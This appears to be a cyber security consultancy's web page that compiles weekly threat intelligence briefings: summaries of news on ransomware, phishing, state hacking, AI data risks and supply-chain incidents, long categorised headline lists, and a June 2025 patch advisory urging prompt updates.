Europol’s latest assessment highlights a booming criminal underground economy fuelled by an insatiable demand for data. With personal and business information now a central commodity, cyber criminals are exploiting gaps in digital literacy and complex IT environments to steal, trade and weaponise data at scale. Stolen credentials are repeatedly used to fuel further breaches, while specialised marketplaces and encrypted channels facilitate widespread illicit trade. Europol warns this cycle is eroding public trust and undermining economic stability.
https://www.infosecurity-magazine.com/news/europol-criminal-demand-data/
AI Is a Data-Breach Time Bomb, Reveals New Report
Varonis has found that nearly every organisation is vulnerable to data exposure as a result of adopting AI without adequate controls. Analysis of 1,000 data risk assessments revealed 99% had sensitive data exposed to AI tools, and 90% had critical cloud data openly accessible. Shadow AI and unverified apps were present in 98% of cases, while 1 in 7 lacked multi-factor authentication. The report highlights how poor identity governance, excessive data access, and sprawling cloud environments are creating significant breach risks. It urges organisations to tighten access, monitor data use, and employ automation to safeguard information in the AI era.
https://www.bleepingcomputer.com/news/security/ai-is-a-data-breach-time-bomb-reveals-new-report/
What Is Penetration Testing? Types, Processes, Tools, and Why It’s All Worth It
Penetration testing is a controlled and authorised simulation of a cyber attack, designed to identify vulnerabilities that could be exploited by real-world threat actors. Ethical hackers emulate criminal tactics to test systems, infrastructure, and even staff behaviour. While automated scans help detect known flaws, penetration testing offers deeper insight by revealing how small issues can be combined into significant risks. It plays a critical role in strengthening cyber resilience, supporting regulatory compliance such as ISO 27001, and demonstrating due diligence. Organisations typically conduct pen tests one or more times a year, often alongside continuous automated scanning.
Black Arrow delivers tailored penetration testing services together with a range of selected partners to help uncover real-world risks through expert-led assessments.
https://blog.jetbrains.com/teamcity/2025/06/what-is-penetration-testing/
Internet Infamy Drives the Com’s Crime Sprees
A growing cyber criminal movement known as “The Com” is drawing in teenagers and young adults who are motivated more by notoriety than money. Their activities range from phishing and SIM swapping to swatting, sextortion and, in some cases, physical violence. Researchers estimate only a small core group is responsible for the most serious crimes, but the wider subculture is expanding rapidly. Law enforcement is now treating parts of the movement as a terrorism threat, with arrests increasing. Analysts warn that underlying socio-economic pressures are driving recruitment, particularly among minors who are seen as lower-risk by criminal gangs.
https://cyberscoop.com/the-com-subculture-infamy-crimes/
China-Linked Threat Actor Targeted +70 Orgs Worldwide, SentinelOne Warns
SentinelOne has uncovered a sustained cyber espionage campaign linked to China, affecting over 70 organisations globally between July 2024 and March 2025. Targets included government bodies, media outlets, and firms in sectors such as finance, manufacturing, and telecoms. The threat actor, dubbed PurpleHaze, used sophisticated techniques including obfuscated malware and dynamic relay networks to maintain stealth and persistence. Victims ranged from a South Asian government entity to a European media firm and even SentinelOne itself. The research highlights an ongoing trend of state-aligned groups targeting cyber security providers, underscoring the need for continuous monitoring and collective defence through intelligence sharing.
Here’s Why Ignoring Politics Is No Longer an Option for Cyber Defence
Flashpoint’s latest report underscores the growing overlap between global politics and cyber threats, with geopolitical tensions now seen as a key driver of cyber activity. Russian organisations, once largely avoided by cyber criminals, are increasingly targeted due to shifting allegiances following the Ukraine conflict. A SANS Institute survey of nearly 500 professionals found that cyber security is now viewed as a core business risk shaped by international events. Threat actors from countries such as North Korea, Iran, and China are deploying tactics including AI-generated deepfakes and disinformation to destabilise democratic processes and evade sanctions, highlighting the need for a broader geopolitical lens in threat assessments.
https://cybernews.com/security/ignoring-politics-is-no-longer-an-option-for-cyber-pros/
UK to Join Up with Allies for Stronger Response to Putin’s ‘Grey Zone’ Warfare
The UK is strengthening cooperation with allies to deter and respond to so-called grey zone threats, including cyber attacks, sabotage of undersea infrastructure and disinformation operations. These sub-threshold activities, increasingly used by Russia, are designed to destabilise without triggering full-scale military conflict. The Government’s latest Strategic Defence Review highlights the need for joint crisis decision-making and improved readiness to counter such tactics. NATO has reaffirmed that cyber or hybrid attacks may justify a collective response under Article 5. The review also stresses the growing complexity of threats, particularly where state actors blur the lines between conventional, cyber and nuclear deterrence.
https://inews.co.uk/news/politics/uk-allies-putin-grey-zone-warfare-3735380
Governance, Risk and Compliance
Rising strategic role of the CISO | Deloitte Insights
Prep for Layoffs Before They Compromise Security
Docuseries Explores Mental, Physical Hardships of CISOs
Investor behaviour in the wake of cyber's 'black swan' moment | Computer Weekly
The Silent Cyber Crisis Alarming Global Economies and Why It's Time for Collective Action | IBTimes
Cyber resilience begins before the crisis | Microsoft Security Blog
Threats
Ransomware, Extortion and Destructive Attacks
DragonForce Victimisation on the Rise | SC Media UK
Attackers exploit Fortinet flaws to deploy Qilin ransomware
Scattered Spider and DragonForce unite to cash in on M&S hacking
Scattered Spider Uses Tech Vendor Impersonation to Target Helpdesks - Infosecurity Magazine
Former Black Basta Members Use Microsoft Teams and Python Scripts in 2025 Attacks
Threat hunting case study: DragonForce | Intel 471
Fog ransomware attack uses unusual mix of legitimate and open-source tools
Agencies Release Actionable Guidance on Play Ransomware | Schwabe, Williamson & Wyatt PC - JDSupra
'PathWiper' Attack Hits Critical Infrastructure In Ukraine
LockBit panel data leak shows Chinese orgs among the most targeted - Help Net Security
South African man imprisoned after ransom demand against his former employer
Ransomware Victims
Scattered Spider and DragonForce unite to cash in on M&S hacking
M&S food sales growth collapses after cyber attack
M&S cyber attack should prompt retailers to focus on response
How did Britain’s food supplies become so vulnerable?
M&S restarts online orders after cyber attack - BBC News
Tax resolution firm Optima Tax Relief hit by ransomware, data leaked
Main distributor to Amazon’s Whole Foods hit by cyber attack
British Horseracing Authority targeted by cyber attack - BBC Sport
Phishing & Email Based Attacks
Cutting-Edge ClickFix Tactics Snowball
Study: 73% of founders can’t spot phishing emails | Cybernews
Employees repeatedly fall for vendor email compromise attacks - Help Net Security
New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users
What is asymmetric cyberattack? | Definition from TechTarget
AitM Phishing Attacks Targeting Microsoft 365 and Google to Steal Login Credentials
That ‘unsubscribe’ link is actually a hidden security risk — do this instead | Tom's Guide
Phishing Alert as Erie Insurance Reveals Cyber “Event” - Infosecurity Magazine
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Employees repeatedly fall for vendor email compromise attacks - Help Net Security
Other Social Engineering
Cutting-Edge ClickFix Tactics Snowball
Help Desk Hoax: How Attackers Bypass Tech Defenses
Cybercriminals are turning stolen data into a thriving black market - Help Net Security
New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users
What is asymmetric cyberattack? | Definition from TechTarget
The 'red flag' Grindr users should watch out for to stay safe
FIN6 hackers pose as job seekers to backdoor recruiters’ devices
Fraud, Scams and Financial Crime
The 'red flag' Grindr users should watch out for to stay safe
145 criminal domains linked to BidenCash Marketplace seized - Help Net Security
Mastercard: Fraud attempts jump as retailers feel cyber attack sting
US files to seize $7.7M laundered by North Korean IT workers • The Register
Five plead guilty to laundering $36 million stolen in investment scams
44% of people encounter a mobile scam every single day, Malwarebytes finds | Malwarebytes
WordPress Sites Turned Weapon: How VexTrio and Affiliates Run a Global Scam Network
Amazon promises fake reviews crackdown after investigation by UK watchdog | Amazon | The Guardian
Artificial Intelligence
Godfather of AI Alarmed as Advanced Systems Quickly Learning to Lie, Deceive, Blackmail and Hack
Next-Gen Developers Are a Cybersecurity Powder Keg
AI threats leave SecOps teams burned out and exposed - Help Net Security
Cloud and AI drive efficiency, but open doors for attackers - Help Net Security
Cyber crime is surging. Will AI make it worse?
AI is a data-breach time bomb, reveals new report
What CISOs need to know about agentic AI - Help Net Security
Securing agentic AI systems before they go rogue - Help Net Security
UK ICO publishes AI and biometrics strategy | Computer Weekly
Enterprises stuck in AI pilot hell, says Chatterbox Labs • The Register
OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups
Malware
New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users
New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally
CISO who helped unmask Badbox warns: Version 3 is coming • The Register
FIN6 Uses AWS-Hosted Fake Resumes on LinkedIn to Deliver More_eggs Malware
Supply chain attack hits Gluestack NPM packages with 960K weekly downloads
Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks
React Native Aria Packages Backdoored in Supply Chain Attack - SecurityWeek
Malicious NPM Packages Disguised as Express Utilities Allow Attackers to Wipe Systems - SecurityWeek
DanaBot malware operators exposed via C2 bug added in 2022
Bots/Botnets
CISO who helped unmask Badbox warns: Version 3 is coming • The Register
New Mirai botnet infects TBK DVR devices via command injection flaw
Recently Disrupted DanaBot Leaked Valuable Data for 3 Years - SecurityWeek
Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks
Mobile
Cyber attacks on smartphones hit new high - here's how to stay safe | TechRadar
44% of people encounter a mobile scam every single day, Malwarebytes finds | Malwarebytes
Millions of low-cost Android devices turn home networks into crime platforms - Ars Technica
Chinese phone hacks, user lapses create 'mobile security crisis' | Fortune
Blocking stolen phones from the cloud can but won't be done • The Register
Cops want Apple, Google to kill stolen phones remotely • The Register
Apple and Google clash with police and MPs over phone thefts - BBC News
Google patched bug leaking phone numbers tied to accounts
Denial of Service/DoS/DDoS
Don’t give hacktivists what they really want | CSO Online
DDoS Attacks on Financial Sector Surge in Scale and Sophistication - Infosecurity Magazine
Internet of Things – IoT
Millions of low-cost Android devices turn home networks into crime platforms - Ars Technica
CISO who helped unmask Badbox warns: Version 3 is coming • The Register
New Mirai botnet infects TBK DVR devices via command injection flaw
40,000 cameras expose feeds to datacenters, health clinics • The Register
I found terrifying smart home security holes and you probably have them too
Data Breaches/Leaks
Cyber criminals are turning stolen data into a thriving black market - Help Net Security
Europol Says Criminal Demand for Data is “Skyrocketing” - Infosecurity Magazine
Recently Disrupted DanaBot Leaked Valuable Data for 3 Years - SecurityWeek
AI is a data-breach time bomb, reveals new report
The Dark Web's Currency of Choice: Stolen Data - IT Security Guru
Legal aid lawyers face 'chaos' following cyber attack - as some left 'in tears' and... - LBC
Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool
'Major compromise' at NHS temping arm never disclosed • The Register
Phishing Alert as Erie Insurance Reveals Cyber “Event” - Infosecurity Magazine
86 million AT&T customer records reportedly up for sale on the dark web | ZDNET
Insurer Exposed Drivers' Personal Information, Court Told - Law360
Organised Crime & Criminal Actors
Cyber criminals are turning stolen data into a thriving black market - Help Net Security
Europol Says Criminal Demand for Data is “Skyrocketing” - Infosecurity Magazine
Cyber crime is surging. Will AI make it worse?
OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups
Five plead guilty to laundering $36 million stolen in investment scams
Cyber criminals turn to “residential proxy” services to hide malicious traffic
Internet infamy drives The Com's crime sprees | CyberScoop
Cyber crime news: How this Canadian hacker was caught
How Crime-As-A-Service Turned Hacking Into A Subscription Business
Hacking the Hackers: When Bad Guys Let Their Guard Down
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Hacker arrested after exploiting 5,000 accounts in $4.5 million cryptojacking scheme | TechSpot
US accuses Russian crypto entrepreneur of money laundering and sanctions evasion
145 criminal domains linked to BidenCash Marketplace seized - Help Net Security
Insurance
Cyber insurance demand is rising, but not 'evenly': Beazley cyber head | Insurance Business America
MSSPs, MSPs See Growing Strategic Role in Cyber Insurance | MSSP Alert
Supply Chain and Third Parties
New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally
M&S restarts online orders after cyber attack - BBC News
Main distributor to Amazon’s Whole Foods hit by cyber attack
CISOs urged to push vendors for roadmaps on post-quantum cryptography readiness | CSO Online
Third-party security weaknesses threaten Europe’s big banks | Computer Weekly
Supply chain attack hits Gluestack NPM packages with 960K weekly downloads
Cloud/SaaS
Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool
Cloud and AI drive efficiency, but open doors for attackers - Help Net Security
AitM Phishing Attacks Targeting Microsoft 365 and Google to Steal Login Credentials
Former Black Basta Members Use Microsoft Teams and Python Scripts in 2025 Attacks
Google Cloud and Cloudflare hit by widespread service outages
Outages
Massive cloud outage knocks out internet services across the globe | ZDNET
‘Severe’ network outages costing $160bn globally | Computer Weekly
Encryption
CISOs urged to push vendors for roadmaps on post-quantum cryptography readiness | CSO Online
See How Much Faster a Quantum Computer Will Crack Encryption | WIRED
Quantum Computers Pose a Grave Risk to The Future. Here's Why. : ScienceAlert
Digital rights groups sound alarm on Stop CSAM Act | CyberScoop
Linux and Open Source
Unverified code is the next national security threat | CyberScoop
Passwords, Credential Stuffing & Brute Force Attacks
295 Malicious IPs Launch Coordinated Brute-Force Attacks on Apache Tomcat Manager
Social Media
The 'red flag' Grindr users should watch out for to stay safe
FIN6 Uses AWS-Hosted Fake Resumes on LinkedIn to Deliver More_eggs Malware
Regulations, Fines and Legislation
Trump cyber executive order takes aim at prior orders, secure software, more | CyberScoop
Banks Challenge Treasury on Cybersecurity Failures - The Global Treasurer
Digital rights groups sound alarm on Stop CSAM Act | CyberScoop
UK ICO publishes AI and biometrics strategy | Computer Weekly
Trump limits use of cyber rules to punish US hackers, election meddlers - Defense One
Trump to Keep Starlink at White House Despite Cyber Security Concern
Models, Frameworks and Standards
Enterprise SIEMs miss 79% of known MITRE ATT&CK techniques - Help Net Security
SIEMs Missing the Mark on MITRE ATT&CK Techniques
NIST Launches Updated Incident Response Guide - Security Boulevard
NIST Publishes New Zero Trust Implementation Guidance - Infosecurity Magazine
Data Protection
Security & data protection: when two become one | TechRadar
Careers, Working in Cyber and Information Security
Human vs digital therapy: AI falls short when IT pros need help | Computer Weekly
Hands-On Skills Now Key to Landing Your First Cyber Role - Infosecurity Magazine
Law Enforcement Action and Take Downs
Hacker arrested after exploiting 5,000 accounts in $4.5 million cryptojacking scheme | TechSpot
145 criminal domains linked to BidenCash Marketplace seized - Help Net Security
Operation Secure: INTERPOL dismantles 20,000+ malicious IPs in major cybercrime crackdown
Five plead guilty to laundering $36 million stolen in investment scams
Police arrests 20 suspects for distributing child sexual abuse content
South African man imprisoned after ransom demand against his former employer
Misinformation, Disinformation and Propaganda
Amazon promises fake reviews crackdown after investigation by UK watchdog | Amazon | The Guardian
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
EU Prepares for Transnational Cyberattacks - DataBreachToday
UK to join up with allies for stronger response to Putin's 'grey zone' warfare
Over 70 Organizations Across Multiple Sectors Targeted by China-Linked Cyber Espionage Group
What would break first if hackers hit US infrastructure? | Cybernews
Nation State Actors
Ignoring politics is no longer an option for cyber pros | Cybernews
Advanced Persistent Threats (APTs) - Detection and Defense Strategies
EU Prepares for Transnational Cyberattacks - DataBreachToday
OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups
China
China-linked threat actor targeted +70 orgs worldwide, SentinelOne warns
Over 70 Organizations Across Multiple Sectors Targeted by China-Linked Cyber Espionage Group
Chinese hackers broke into US telecom earlier than previously known, Bloomberg reports | Reuters
Chinese phone hacks, user lapses create 'mobile security crisis' | Fortune
Russian Spies Are Suspicious of China, Even as Putin and Xi Grow Close - The New York Times
SentinelOne shares new details on China-linked breach attempt
Russia
Eastern Europe’s Cyber Reckoning: Russia’s Digital Threat Is Forcing a Strategic Shift - Inkstick
UK to join up with allies for stronger response to Putin's 'grey zone' warfare
Russian Spies Are Suspicious of China, Even as Putin and Xi Grow Close - The New York Times
Why Russia Should Fear Ukraine’s Advanced Intelligence Network - The National Interest
'PathWiper' Attack Hits Critical Infrastructure In Ukraine
How The Times Obtained Secret Russian Intelligence Documents - The New York Times
US accuses Russian crypto entrepreneur of money laundering and sanctions evasion
LockBit panel data leak shows Chinese orgs among the most targeted - Help Net Security
'Librarian Ghouls' Cyberattackers Strike at Night
North Korea
US files to seize $7.7M laundered by North Korean IT workers • The Register
Tools and Controls
Enterprise SIEMs miss 79% of known MITRE ATT&CK techniques - Help Net Security
SIEMs Missing the Mark on MITRE ATT&CK Techniques
Next-Gen Developers Are a Cybersecurity Powder Keg
Cyber resilience begins before the crisis | Microsoft Security Blog
CISOs call for operational threat intelligence integration - Help Net Security
Nearly all CISOs struggle with threat intelligence barriers: report
Advanced Persistent Threats (APTs) - Detection and Defense Strategies
NIST Launches Updated Incident Response Guide - Security Boulevard
Cyber insurance demand is rising, but not 'evenly': Beazley cyber head | Insurance Business America
AI threats leave SecOps teams burned out and exposed - Help Net Security
The massive, no-good concerns around agentic AI cybersecurity - Tech Monitor
Study: 73% of founders can’t spot phishing emails | Cybernews
Prep for Layoffs Before They Compromise Security
Why Threat Agents Must be Included in Cyber Security Risk Assessments - Security Boulevard
NIST Publishes New Zero Trust Implementation Guidance - Infosecurity Magazine
MSSPs, MSPs See Growing Strategic Role in Cyber Insurance | MSSP Alert
Inside the Mind of the Adversary: Why More Security Leaders Are Selecting AEV
Your Android phone is getting new security protections - and it's a big deal for enterprises | ZDNET
Microsoft Outlook to block more risky attachments used in attacks
ConnectWise to Rotate ScreenConnect Code Signing Certificates Due to Security Risks
Other News
Investor behaviour in the wake of cyber's 'black swan' moment | Computer Weekly
What Held the Internet Together for 20 Years and Why It’s Now at Risk - Internet Society
EU Updates Cyber Crisis Blueprint to Strengthen Regional Response | MSSP Alert
EU to ‘step up’ on cyber security as dependence on US laid bare
What would break first if hackers hit US infrastructure? | Cybernews
Surge in Cyber Attacks Targeting Journalists: Cloudflare - SecurityWeek
Vulnerability Management
Security flaws in government apps go unpatched for years - Help Net Security
Vulnerabilities
Microsoft June 2025 Patch Tuesday fixes exploited zero-day, 66 flaws
Adobe Releases Patch Fixing 254 Vulnerabilities, Closing High-Severity Security Gaps
APT Hackers Exploited Windows WebDAV 0-Day RCE Vulnerability in the Wild to Deploy Malware
Multiple Chrome Vulnerabilities Allow Attackers to Execute Malicious Code Remotely
Attackers exploit Fortinet flaws to deploy Qilin ransomware
Over 84,000 Roundcube instances vulnerable to actively exploited flaw
Ivanti Workspace Control hardcoded key flaws expose SQL credentials
Zero Day Initiative — The June 2025 Security Update Review
Palo Alto Networks Patches Privilege Escalation Vulnerabilities - SecurityWeek
Fortinet, Ivanti Patch High-Severity Vulnerabilities - SecurityWeek
Chrome, Firefox Updates Resolve High-Severity Memory Bugs - SecurityWeek
Trend Micro fixes critical vulnerabilities in multiple products
ConnectWise to Rotate ScreenConnect Code Signing Certificates Due to Security Risks
Google patched bug leaking phone numbers tied to accounts
SAP June 2025 Security Patch Day fixed critical NetWeaver bug
Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks
PayU Plugin Flaw Allows Account Takeover on 5000 WordPress Sites - Infosecurity Magazine
Five Zero-Days, 15 Misconfigurations Found in Salesforce Industry Cloud - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Black Arrow Cyber Advisory 11 June 2025 – Security Updates from Microsoft, Adobe, Ivanti, Salesforce, SAP, and Google
Executive Summary
Microsoft’s Patch Tuesday for June 2025 delivered updates for 66 vulnerabilities, including one actively exploited zero‑day WebDAV remote code execution flaw, alongside nine critical issues such as RCE and privilege escalation in SMB, SharePoint, and Windows Hello for Business.
Adobe patched critical and important vulnerabilities in Acrobat/Reader, InCopy, and Commerce/Magento, notably 254 flaws in Adobe Experience Manager (mostly XSS) and a critical Magento XSS flaw (CVE-2025-47110) with potential for arbitrary code execution.
Ivanti’s June advisory fixes multiple high-severity issues in Workspace Control (for example, hardcoded keys that allow SQL credentials to be decrypted) and addresses vulnerabilities in EPMM previously exploited in the wild (CVE-2025-4427 and CVE-2025-4428).
Salesforce Industry Cloud fixed five zero-days and 15 critical misconfigurations that risk unauthorised access to encrypted data, sessions, credentials, and business logic.
SAP released its June Security Patch Day, addressing 19 notes, including a critical missing-authorisation flaw in NetWeaver RFC (CVE-2025-42989, CVSS 9.6) that allows privilege escalation.
Google Chrome received a security update fixing two high-severity remote code execution (RCE) bugs in the V8 engine affecting Windows, macOS, and Linux users.
What’s the risk to me or my business?
The presence of actively exploited zero‑days and critical RCE/privilege escalation vulnerabilities across major enterprise platforms significantly elevates the risk of data breaches, lateral movement, malware deployment, and full system compromise.
What can I do?
Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.
Microsoft
Further details on the specific updates within this Microsoft Patch Tuesday can be found here:
June 2025 Security Updates - Release Notes - Security Update Guide - Microsoft
Adobe, Ivanti, Salesforce, SAP, and Google
Further details of the vulnerabilities affecting Adobe, Ivanti, Salesforce, SAP and Google products:
https://helpx.adobe.com/security/security-bulletin.html
https://appomni.com/blog/low-code-high-stakes-salesforce-security/
https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2025.html
https://chromereleases.googleblog.com/2025/06/stable-channel-update-for-desktop_10.html
Black Arrow Cyber Threat Intelligence Briefing 06 June 2025
-Half of Firms Suffer Two Supply Chain Incidents in Past Year
-Vendor Email Compromise (VEC) Attacks Outpace Business Email Compromise (BEC) in EMEA
-UK SMBs Are Ramping Up Cyber Security Spending
-CISO Roles Expand Beyond Cyber Security as Organisations Embrace Strategic Security Leadership
-CISO 3.0: Leading AI Governance and Security in the Boardroom
-Play Ransomware Breached 900 Victims, Including Critical Orgs
-Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady
-Role of Threat Intelligence in Proactive Defence Strategies
-Beware GenAI Use is Outpacing Security Controls
-Why Teenage Hackers Pose More Danger Than Ever
-‘Nation States don’t do hacking for fun’ UK NCSC Urges Businesses to Follow Geopolitics as Defensive Strategy
-Damascened Peacock: Russian Hackers Targeted UK Ministry of Defence
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing, a weekly digest collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities and cyber-related news from the last week.
Executive Summary
Our review this week includes the complexity of cyber risk, with UK organisations reporting a sharp rise in supply chain-related incidents and limited visibility across third-party networks. As we discuss in our training events, vendor email compromise (VEC) is growing in prominence alongside BEC, exploiting trust in external partners to evade detection. Organisations need to review their control framework, including training staff and leaders on identifying and reporting suspicious communications, and adhering to the letter and spirit of operational controls that attackers seek to exploit.
We also explore the shifting role of the CISO, now increasingly embedded in strategic business leadership. As AI becomes more integrated into operations, CISOs must balance innovation with governance, mastering risk management to promote responsible adoption. The rise of fractional CISOs offers small and medium firms access to broad expertise at lower cost, which we provide for our clients. Threat actors continue to evolve, with ransomware groups like Play expanding their reach, and teenage hackers blurring the line between mischief and organised crime.
The UK’s Ministry of Defence has disclosed a thwarted spear-phishing campaign by Russia-linked actors posing as journalists, part of over 90,000 state-linked threats in two years. This highlights the growing use of cyber operations in geopolitical conflict. Finally, the unmonitored use of generative AI tools is accelerating, raising concerns about data loss and regulatory breaches. Black Arrow recommends that leaders prioritise visibility across supply chains, invest in adaptive security training by experts, and align AI and threat intelligence strategies with robust governance frameworks.
Top Cyber Stories of the Last Week
Half of Firms Suffer Two Supply Chain Incidents in Past Year
New research reveals that nearly half of UK organisations have faced two or more supply chain-related cyber incidents in the past year, highlighting growing concerns over third-party vulnerabilities. Despite 90% identifying supply chain threats as a top priority for 2025, only 37% felt their current risk management strategies were truly effective. The report points to poor collaboration between stakeholders and inconsistent visibility across sectors, with just 14% of organisations having full visibility into all supply chain tiers. As the UK prepares to introduce new cyber resilience legislation, firms are calling for stronger regulatory powers and incentives to drive better cross-industry coordination.
https://www.infosecurity-magazine.com/news/half-supply-chain-incidents/
Vendor Email Compromise (VEC) Attacks Outpace Business Email Compromise (BEC) in EMEA
New research shows that Vendor Email Compromise (VEC) attacks are now outpacing traditional Business Email Compromise (BEC) across EMEA, with nearly half of recipients engaging with VEC emails, almost double the rate of BEC. VEC exploits trust in external vendors, making it harder to detect and rarely reported by users. With reporting rates as low as 0.2% in EMEA, these scams pose a growing challenge. The findings highlight the need for enhanced email security platforms, third-party behaviour monitoring, and targeted user education to better defend against increasingly sophisticated impersonation threats.
https://www.msspalert.com/brief/vec-attacks-outpace-bec-in-emea-a-growing-challenge-for-mssps
UK SMBs Are Ramping Up Cyber Security Spending
Over half of UK small businesses increased their cyber security spending last year. Phishing, ransomware, and denial-of-service attacks remain key risks. Meanwhile, growing interest in generative AI is prompting fresh concerns around data protection, regulatory uncertainty, and staff readiness, with many SMBs expressing caution over privacy, reliability, and the potential loss of personalised service.
https://www.itpro.com/security/uk-smbs-are-ramping-up-cybersecurity-spending-and-its-about-time
CISO Roles Expand Beyond Cyber Security as Organisations Embrace Strategic Security Leadership
The role of the Chief Information Security Officer (CISO) is undergoing a strategic shift, moving beyond technical oversight to encompass broader business responsibilities including risk management, IT, and digital transformation. Nearly 40% of CISOs now hold senior executive titles, with over half engaging regularly with boards, rising to 65% in large enterprises. Research shows three clear CISO types: Strategic, Functional, and Tactical, with Strategic CISOs earning significantly higher compensation and reporting the greatest job satisfaction. This transformation reflects growing recognition that effective cyber security leadership is now integral to overall business success and long-term resilience. A good outsourced fractional CISO, offering cost-effective expertise across the Strategic, Functional and Tactical roles, can benefit organisations with fewer resources, often providing a much wider range of skills and experience than a single individual could.
https://cybersecuritynews.com/ciso-roles-expand-beyond-cybersecurity/
CISO 3.0: Leading AI Governance and Security in the Boardroom
CISOs are evolving into strategic advisors as AI becomes embedded across business operations, with 85% of IT leaders believing AI can enhance cyber security. However, practical challenges persist around system visibility, false positives, and integration with legacy infrastructure. To govern AI effectively, CISOs must gain fluency in data science and risk modelling, ensuring AI tools are explainable and accountable. Building a security culture that embraces AI starts with education, using adaptive and immersive training to close skills gaps. Successful adoption hinges on choosing trustworthy vendors and aligning tools with governance frameworks and business needs.
https://www.helpnetsecurity.com/2025/06/02/aaron-mccray-cdw-cisos-ai-security/
Play Ransomware Breached 900 Victims, Including Critical Orgs
The Play ransomware group has now impacted around 900 organisations globally, including critical infrastructure, marking a threefold increase in victims since late 2023. Active since 2022, the group is known for stealing sensitive data before encrypting systems, using email for extortion rather than dark web platforms. Their attacks are made harder to detect by constantly altering their malware and exploiting known software flaws. Authorities urge organisations to keep systems updated, use multifactor authentication on key services, and ensure offline backups and recovery plans are in place to mitigate the growing risk of ransomware attacks.
Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady
Cowbell’s latest report highlights a sharp rise in cyber claims, driven by increasingly sophisticated attacks. Ransomware remains a consistent threat, making up nearly one in five claims. The most damaging incidents stemmed from just five criminal groups, often exploiting basic weaknesses like unpatched systems or misconfigured email. Phishing continues to be the top entry point for wider breaches and fraud. Professional services, healthcare, education, construction and manufacturing were the most targeted, underscoring the growing impact of cyber attacks on sectors reliant on sensitive data and operational continuity.
https://www.claimsjournal.com/news/national/2025/06/06/330974.htm
Role of Threat Intelligence in Proactive Defence Strategies
Organisations are increasingly shifting from reactive to proactive cyber security strategies, with threat intelligence now central to anticipating and preventing attacks. By integrating strategic, operational, and technical insights into existing defences, businesses are improving detection speeds and reducing attack success rates by over 97%. The use of real-time threat data, predictive analytics, and advanced threat hunting helps organisations detect adversaries earlier and act faster. With the average breach costing nearly USD 4.9 million, the economic case for investing in threat intelligence is growing, offering both financial resilience and enhanced protection in a rapidly evolving threat landscape.
https://cybersecuritynews.com/threat-intelligence-3/
Beware GenAI Use is Outpacing Security Controls
Palo Alto Networks has found that employees in every organisation are now using an average of 6.6 high-risk generative AI tools, often without the knowledge of security teams. In some firms, over 60 different AI applications are present in the environment, with writing assistants and chatbots being the most common. Alarmingly, incidents involving data loss linked to these tools have more than doubled in the past year. Experts warn that without clear policies and real-time monitoring, organisations risk data leaks and regulatory breaches, and may even unintentionally encourage shadow AI use by rewarding the quality of the output it produces.
https://www.csoonline.com/article/4002103/cisos-beware-genai-use-is-outpacing-security-controls.html
Why Teenage Hackers Pose More Danger Than Ever
Recent high-profile cyber attacks on UK retailers such as M&S and Co-op have exposed a growing and alarming trend: many of these incidents are not the work of overseas state-backed groups, but of teenage hackers operating from bedrooms in the UK and US. Often meeting online through chat forums, these individuals, sometimes referred to as collectives like Scattered Spider, launch attacks for thrill, money, and status. This new generation of hackers combines social manipulation techniques with access to professional criminal tools, blurring the line between youthful mischief and serious organised crime. Tackling this rising threat requires a shift in how we understand and deter cyber crime.
‘Nation States don’t do hacking for fun’ UK NCSC Urges Businesses to Follow Geopolitics as Defensive Strategy
The UK National Cyber Security Centre (NCSC) has warned that nation states are increasingly using cyber attacks as tools of sabotage and espionage, often targeting supply chains and critical infrastructure. Russia’s offensive cyber capabilities have advanced significantly, with recent attacks timed to coincide with military operations, while China is believed to be embedding threat groups within key systems to prepare for possible future conflict. The NCSC urged businesses to understand how global geopolitical tensions intersect with their own cyber risk exposure. Despite this, financially motivated cyber criminals remain the most common threat, with many incidents causing unintended collateral damage to private firms.
Damascened Peacock: Russian Hackers Targeted UK Ministry of Defence
The UK’s Ministry of Defence has disclosed a sophisticated cyber attack attempt by Russia-linked hackers posing as journalists in a spear phishing campaign dubbed “Damascened Peacock”. The attackers aimed to deploy malware through deceptive emails disguised as urgent media or financial requests. Although the attack was thwarted, it is part of over 90,000 state-linked cyber threats against UK defence in the past two years. The malware used was new and linked to a known Russian group previously active in targeting military and government entities across the West. The UK is now investing in stronger cyber capabilities to counter such threats.
Governance, Risk and Compliance
